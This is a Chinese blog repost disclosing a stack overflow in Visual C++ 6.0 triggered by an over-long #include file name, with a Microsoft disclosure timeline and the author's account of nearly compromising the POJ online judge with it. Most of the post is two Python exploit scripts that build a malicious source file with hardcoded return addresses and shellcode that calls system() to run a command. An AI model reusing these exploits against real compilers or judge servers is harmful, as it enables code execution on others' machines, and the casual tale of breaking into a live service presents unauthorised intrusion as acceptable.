vc6.0栈溢出

最新推荐文章于 2020-12-21 15:49:30 发布
最新推荐文章于 2020-12-21 15:49:30 发布
阅读量715 收藏
点赞数
分类专栏: 漏洞 文章标签: cmd python import system include 公告

问题处在include的文件名长度未检测。
比如
#include "AAAA....AA"(超多A)
就会挂。

<=2008-2-17 发现漏洞。
2008-3-3 报告给MS,当天收到答复,说正在研究中。
2008-3-4 MS确认这是一个安全缺陷,但说Visual C++ 6.0的产品支持生命周期已经于2005年9月30日结束,因此不会为这个漏
洞发布安全公告或安全建议,且建议我不要公开。

我差点利用这个漏洞黑了poj(acm.pku.edu.cn,做acm的同学应该都知道这个网站)。
可惜功亏一篑,只得到了一台没有价值的内网机器,最后和管理员摊牌了。
既然现在poj已经把vc6.0换成了vs2008,那我就没有继续憋着的理由了哈哈。

下面给出两个不同的vc6.0 sp6的exp,其他的sp可能偏移不一样,自己调试吧。

vc6_exp.py

C++代码
  1. ######################################################################   
  2. #!/usr/bin/env python   
  3. # vc6 exploit by cly   
  4. # 2008-2-17   
  5. import struct   
  6.   
  7. address_jmp_esp = 0x1065AEB3   
  8. address_system = 0x77BF93C7   
  9. address_exit = 0x77C09E7E   
  10. filename = 'e.c'   
  11. cmd = 'calc'   
  12.   
  13. f = open(filename, 'wb' )   
  14. f.write('#include "c://A' + cmd + '||' + 'A' * (146 - len(cmd))   
  15. + struct .pack('<i' , address_jmp_esp)   
  16. + '/x83/xEC/x33/x83/xEC/x65/x8B/xC4/x83/xEC
  17. /x04/x89/x04/x24/xE8'   
  18. + struct .pack('<i' , address_system - 0x0012F0AF) + '/xE8'   
  19. + struct .pack('<i' , address_exit - 0x0012F0B4) + 'A' * 84 +   
  20. '"' )   
  21. f.close()   
  22. ######################################################################   
  23.   
  24. vc6_exp2.py   
  25. ######################################################################   
  26. #!/usr/bin/env python   
  27. # vc6 exploit by cly   
  28. # 2008-2-17   
  29. import struct   
  30.   
  31. filename = 'e.c'   
  32. cmd = 'calc'   
  33.   
  34. address_data = 0x1066EFFB   
  35.   
  36. shellcode = '/x32/xC0' # xor al, al   
  37. shellcode += '/xA2/x9E/xF0/x66/x10' # mov [1066F09E], al   
  38. shellcode += '/xA2/xA5/xF0/x66/x10' # mov [1066F0A5], al   
  39. shellcode += '/x68/x94/xf0/x66/x10' # push 1066F094 ; ASCII   
  40. "msvcrt.dll"   
  41. shellcode += '/xFF/x15/xD8/x31/x65/x10' # call [106531D8] ;   
  42. kernel32.GetModuleHandleA   
  43. shellcode += '/x68/x9F/xF0/x66/x10' # push 1066F09F ; ASCII   
  44. "system"   
  45. shellcode += '/x50' # push eax   
  46. shellcode += '/xFF/x15/xDC/x31/x65/x10' # call [106531DC] ;   
  47. kernel32.GetProcAddress   
  48. shellcode += '/x68/xA6/xF0/x66/x10' # push 1066F0A6 ; ASCII   
  49. cmd   
  50. shellcode += '/xFF/xD0' # call eax   
  51. shellcode += '/x32/xC0' # xor al, al   
  52. shellcode += '/x50' # push eax   
  53. shellcode += '/xFF/x15/xB8/x31/x65/x10' # call [106531B8] ;   
  54. kernel32.ExitProcess   
  55.   
  56. f = open(filename, 'wb' )   
  57. f.write('#include "c://' + shellcode + ' A' * (149 - len(shellcode))
  58. + struct.pack(' <i', address_data) + ' msvcrt.dllAsystemA'
  59. + cmd + ' ' * (90 - len(cmd)) + ' "')   
  60. f.close()   
  61. ######################################################################   引用原文http://hi.baidu.com/7878k/blog/item/42dd49ef67a6a1e9cf1b3e57.html
luluxu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VC的溢出
GetData's mode
08-07 641
vc6调试缓冲区溢出的笨办法
bucherren的专栏
01-10 969
从vc7以后对调试缓冲区溢出有了很多办法,vc6貌似没有直接的办法,要么用第三方工具。 下面有一个土一点的办法: 1. 一般函数调用前都有push ebp; move ebp, esp;这样的语句,这两条语句是为了保存返回地址。可以在move ebp, esp之前查看ebp的值,然后在内存窗口的地址中输入ebp的值,不要关闭内存窗口。 2. 单步前进,同时关注内存窗口。如果发现值变了,(这个
VC6 设置栈空间
specialsun的专栏
08-11 507
     有时在栈上分配比较大的变量时, 程序运行会报 Stack Overflow 的错误, vc默认的栈空间才1M, 我们可以修改栈空间大小      Project -&gt; Setting -&gt; Link -&gt; Output -&gt; Stack: Reserve: 31457280(30*1024*1024) 即可, 其以B为单位,则设置了30M的栈空间. 不过不推...
栈溢出攻击c语言_栈溢出攻击学习与实践
weixin_39956451的博客
12-21 350
栈结构及形成过程一个进程可能被加载到内存中不同的区域执行。进程运行所使用的内存空间按照功能,大致都能分成以下 4 个部分:数据区:用来存储全局变量等。栈区:用来存储函数之间的调用关系,以保证被调用函数在返回时恢复到母函数中继续执行。堆区:动态分配与回收是堆区的最大特点,进程能够动态的申请一定大小的缓冲,并在用完之后归还给堆区。代码区:存储 CPU 所执行的机器码,CPU 会到这个区域来读取指令并执...
VC++6.0的大bug(运行成功,调试出错,溢出)的解决方案
Xia Qiaolin - CSDN
06-01 1863
BUG: "Unhandled exception in EXENAME.EXE(OLE32.DLL): 0xC0000005: Access Violation" when you use an ATL Composite control on computers without Visual C++ installedhttp://support.microsoft.com/kb/228530
vc6.0安装包
01-22
5. **安全警告**:由于年代久远,VC6.0可能没有现代IDE的安全特性,如代码审查和防止缓冲区溢出等。在实际开发中需要注意代码安全,避免引入潜在的安全风险。 **社区支持和扩展** 尽管官方已经停止对VC6.0的支持,...
VC6.0安装包.zip
05-18
4. **安全性**:VC6.0的编译器没有最新的安全特性,如缓冲区溢出检查,这可能导致代码存在安全隐患。 ### 替代方案 考虑到以上挑战,开发者可能需要考虑升级到更现代的IDE,如Visual Studio 2019或2022,它们提供...
vc6.0.rar_VC6.0计算器
09-19
VC6.0计算器源代码解析与学习指南》 Visual C++ 6.0(简称VC6.0)是微软公司推出的一款经典且强大的C++集成开发环境,它以其高效、稳定和强大的MFC(Microsoft Foundation Classes)库,深受程序员喜爱。在本篇...
vc6.0安装包.rar
04-06
Visual C++ 6.0(简称VC6.0)是Microsoft在1998年发布的一款集成开发环境,它对于许多程序员来说,不仅是学习C++的入门工具,也是开发Windows应用程序的经典选择。虽然微软已经推出了更新的版本,但VC6.0因其简洁的...
vc 6.0简介.rar
最新发布
05-22
- **安全性**:VC 6.0 的编译器存在一些已知的安全漏洞,如缓冲区溢出问题。在编写代码时,应遵循良好的编程习惯,避免这些问题。 - **第三方库支持**:虽然很多第三方库不再支持VC 6.0,但仍有部分库可以选择,如...
[转]C++ 堆栈溢出的原因以及可行的解决方法
weixin_30474613的博客
06-28 3406
栈溢出(stackoverflow)的原因及解决办法 大家都知道,Windows程序的内存机制大概是这样的:全局变量(局部的静态变量本质也属于此范围)存储于堆内存,该段内存较大,一般不会溢出; 函数地址、函数参数、局部变量等信息存储于栈内存,VC++6中栈内存默认大小为1M,对于当前日益扩大的程序规模而言,稍有不慎就可能出问题(动态申请的内存即new出来的内存不在栈中),即如果函数这样写: ...
栈溢出崩溃排查(二)
马大叔的工作日记
06-12 5148
(接上文) 竟然全是0,试着输出再多一些,输入dps esp L100,终于能看到熟悉的调用栈了,当然这种形式与我们平时看windbg的不同,这里把调用栈的原始数据输出了,具体调用流程,还要我们自己去分析。 实际上到这里,已经猜到十有八九是发生了栈溢出,其判断理由有二,第一EIP和EBP的值同时被覆盖掉了,第二EIP和EBP的值跟ESP指向的栈上的值相同,都是0,想想函数的调用过程,当函数调用
c++程序。函数栈溢出Stack Overflow)问题的解决。
荣荣闲不住的博客
11-26 2992
最近做了一个作业,关于进行矢量量化(LGB编码)的问题,通过训练码书对图片进行编码(压缩) 码书也设计好了,训练出来了,一到对图片进行压缩的函数就报错说(Stack Overflow)栈溢出,我还没有定义什么大的数组,函数也没有很多形参或是指针的东西。错误就是找不出来。 翻遍百度终于找到了解决方法: 在项目--&gt;属性--&gt;链接器--&gt;系统--&gt;堆栈保留大小中填入数据1...
C++ 之栈溢出
WSG的博客--盛年不重来,一日难再晨.及时当勉励,岁月不待人.
07-08 3324
一 栈是什么 如下图所示,除程序不可使用的内存区外,有效内存区域可分为栈(statck)、堆(heap)、数据段、代码段。 整个内存都是用来存储数据的,栈也不例外。栈主要用来存储程序的局部数据。对于C/C++来说,局部数据是指在函数内部定义的数据,例如在函数内部定义的变量、指针、函数参数等,它们都要保存到栈中。 二 栈溢出 对于每个程序,栈能使用的内存是有...
Win7下VC++6.0打开文件报错导致其崩溃的解决办法
热门推荐
数据实验室
03-14 5万+
在Windows7下安装Visual C++ 6.0后,遇到一个致命的问题打开文件的时候出现异常而导致VC6崩溃。 如下图所示:                                       微软针对这个问题发布了一个补丁,原补丁是未编译的VC++6工程(FileTool),大家可以手动在VC++6.0环境下编译一下。 为了方便使用,我在这里还提供了一个已编译的版本
关于vc数值溢出的问题-1.#IND000000000
liulina603的专栏
07-08 3559
-1.#IND000000000 数字识别程序发现了一个问题,应该在以后中注意,就是一个典型的误差问题, 原程序如下计算光谱角: double SAM(double *a, double *b, long bands) {  double dis = 0;  int i;  double d1,d2,d3;  d1=0;d2=0;d3=0;  for(i=0; i  {
VC6.0 MFC实现串口通信教程
"这篇教程详细介绍了如何在VC6.0环境下使用MFC开发一个简单的串口通信应用,类似于串口助手。" 在Windows应用程序开发中,串口通信是一种常见的技术,用于PC与单片机之间的数据交换。MFC(Microsoft Foundation ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值